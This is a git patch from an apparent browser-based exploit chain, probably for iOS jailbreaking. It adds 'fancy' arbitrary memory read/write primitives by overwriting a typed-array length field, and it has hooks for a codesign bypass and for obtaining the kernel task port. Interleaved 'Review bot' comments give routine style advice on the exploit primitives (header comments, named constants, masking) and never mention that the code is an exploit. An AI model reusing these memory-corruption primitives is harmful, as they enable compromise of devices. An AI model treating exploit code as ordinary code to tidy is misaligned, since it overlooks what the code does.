From 6d609fb3dc90d646ed25bd89ff9ab37c8b3f9aec Mon Sep 17 00:00:00 2001
From: spv420
Date: Mon, 11 Jul 2022 21:19:25 -0400
Subject: faster r/w
---
 src/js/main.js | 8 ++++++--
 src/js/primitives/mem.js | 43 +++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 49 insertions(+), 2 deletions(-)
(limited to 'src')
diff --git a/src/js/main.js b/src/js/main.js
index 8a13df6..5c45e85 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -77,9 +77,13 @@ function main() {
 large_buf[0] = 0x41424344;
 printf("%x\n", read_u32(large_buf_ptr));
- csbypass();
+// csbypass();
- return;
+// return;
+
+ setup_fancy_rw();
+
+ printf("%s\n", hexdump(read_buf(0x422200, 0x200), 8, 2, 0x422200, 8, '0'));
 var tfp0 = get_kernel_task();
diff --git a/src/js/primitives/mem.js b/src/js/primitives/mem.js
index 0cd2b7d..6e21fb0 100644
--- a/src/js/primitives/mem.js
+++ b/src/js/primitives/mem.js
@@ -1,6 +1,7 @@
 var shit_status = 0x144444;
 var global_sptr_addy = 0;
 var VECTOR_OFFSET = 0x10;
+var fancy_rw = false;
 var sptr_size = 0;
 var sptr_len = 0;
@@ -8,6 +9,10 @@ var sptr_len = 0;
 * read uint8_t
 */
 function read_u8(addy) {
+ if (fancy_rw) {
+ return parent[addy];
+ }
+
 u8x4 = u32_to_u8x4(addy);
 /*
@@ -34,6 +39,10 @@ function read_u8(addy) {
 * read uint16_t
 */
 function read_u16(addy) {
+ if (fancy_rw) {
+ return u8x2_to_u16([parent[addy], parent[addy + 1]]);
+ }
+
 u8x4 = u32_to_u8x4(addy);
 parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -49,6 +58,10 @@ function read_u16(addy) {
 * read uint32_t
 */
 function read_u32(addy) {
+ if (fancy_rw) {
+ return u8x4_to_u32([parent[addy], parent[addy + 1], parent[addy + 2], parent[addy + 3]]);
+ }
+
 u8x4 = u32_to_u8x4(addy);
 parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -110,6 +123,11 @@ function fast_write_buf(addy, buf) {
 * write uint8_t
 */
 function write_u8(addy, what) {
+ if (fancy_rw) {
+ parent[addy] = what;
+ return;
+ }
+
 u8x4 = u32_to_u8x4(addy);
 parent[VECTOR_OFFSET + 0x0] = u8x4[0];
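Review bot: The `csbypass();` and `return;` lines at the top of the main.js hunk are kept as `//` comments instead of being removed, so `main()` now carries dead code that a reader cannot distinguish from a deliberate toggle. Delete them and let history keep the old path, or gate the old path behind a named flag the way `fancy_rw` gates the new path in mem.js. The `printf("%s\n", hexdump(...))` added after `setup_fancy_rw();` reads like a debug self-check; if it is meant to stay, a one-line comment such as `// sanity check: dump the region after setup_fancy_rw` would stop the next reader from stripping it as leftover debugging. `main()` starts and ends outside the hunk.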
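Review bot: The `fancy_rw` fast path inserted at the top of `read_u8` is not mentioned in the `/** read uint8_t */` header, so the header now documents only the slower path below it; the same applies to `read_u16`, `read_u32` and `write_u8` in this file and to `write_u16` and `write_u32` in the later hunks. A line in each header such as ` * fast path: when fancy_rw is set, accesses parent[addy] directly instead of going through the VECTOR_OFFSET slot` would keep both paths visible to a reader. The `write_u8` fast path also differs from `write_u16`/`write_u32` in not masking the value: `parent[addy] = what & 0xff;` would make the three write paths consistent (whether `parent` truncates on store is not visible in this diff, so the mask is also documentation). Each function's body continues past its hunk.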
@@ -124,6 +142,13 @@ function write_u8(addy, what) {
 * write uint16_t
 */
 function write_u16(addy, what) {
+ if (fancy_rw) {
+ parent[addy] = what & 0xff;
+ parent[addy + 1] = (what >> 8) & 0xff;
+
+ return;
+ }
+
 u8x4 = u32_to_u8x4(addy);
 parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -140,6 +165,15 @@ function write_u16(addy, what) {
 * write uint32_t
 */
 function write_u32(addy, what) {
+ if (fancy_rw) {
+ parent[addy] = what & 0xff;
+ parent[addy + 1] = (what >> 8) & 0xff;
+ parent[addy + 2] = (what >> 16) & 0xff;
+ parent[addy + 3] = (what >> 24) & 0xff;
+
+ return;
+ }
+
 u8x4 = u32_to_u8x4(addy);
 parent[VECTOR_OFFSET + 0x0] = u8x4[0];
@@ -267,4 +301,13 @@ function leak_vec(arr) {
 var addy = addrof(arr);
 printf("%x\n", addy);
 return read_u32(addy + VECTOR_OFFSET);
+}
+
+function setup_fancy_rw() {
+ write_u32(0x422294, 0xffffffff);
+ write_u32(0x422290, 0x0);
+
+ fancy_rw = true;
+
+ printf("%08x\n", u8x4_to_u32([parent[0x5000], parent[0x5001], parent[0x5002], parent[0x5003]]));
 }
\ No newline at end of file
--
cgit v1.2.3
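Review bot: `setup_fancy_rw` is the only function in the last hunk without the `/** ... */` header the rest of mem.js uses, and its two `write_u32` calls are bare magic numbers with nothing saying what state they establish or why `fancy_rw` may only be set afterwards. Add a header in the file's style stating that it must run once before `fancy_rw` is honoured, and move the two addresses into named `var` constants near `VECTOR_OFFSET` with a short comment each rather than leaving raw literals in the body. The trailing `printf("%08x\n", ...)` of four bytes at `0x5000` looks like a debug self-check; label it as such with a comment or drop it, since the function returns nothing and a caller cannot act on the result. The `\ No newline at end of file` marker shows the closing `}` of `leak_vec` was reused as the new function's last line; ending the file with a newline would avoid this churn in later diffs.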